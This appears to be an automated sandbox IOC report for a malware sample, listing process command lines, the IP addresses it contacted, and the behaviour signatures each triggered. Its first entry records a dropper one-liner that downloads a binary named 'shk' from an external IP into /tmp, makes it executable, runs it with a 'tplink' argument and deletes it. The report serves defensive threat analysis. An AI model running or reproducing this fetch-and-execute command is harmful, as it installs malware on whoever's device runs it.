Automated Malware Analysis IOC Report for

Path

Cmdline

Malicious

/bin/sh

/bin/sh -c "cd /tmp; rm -rf shk; wget http://89.190.156.173/shk; chmod 777 shk; ./shk tplink; rm -rf shk"

/bin/sh

/usr/bin/rm

rm -rf shk

/bin/sh

/usr/bin/wget

wget http://89.190.156.173/shk

Domain

Country

Malicious

89.190.156.173

unknown

United Kingdom

Details

Signature Hits	Behavior Group	Mitre Attack
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

109.202.202.202

unknown

Switzerland

Details

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.43

unknown

United Kingdom

Details

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

IOC Report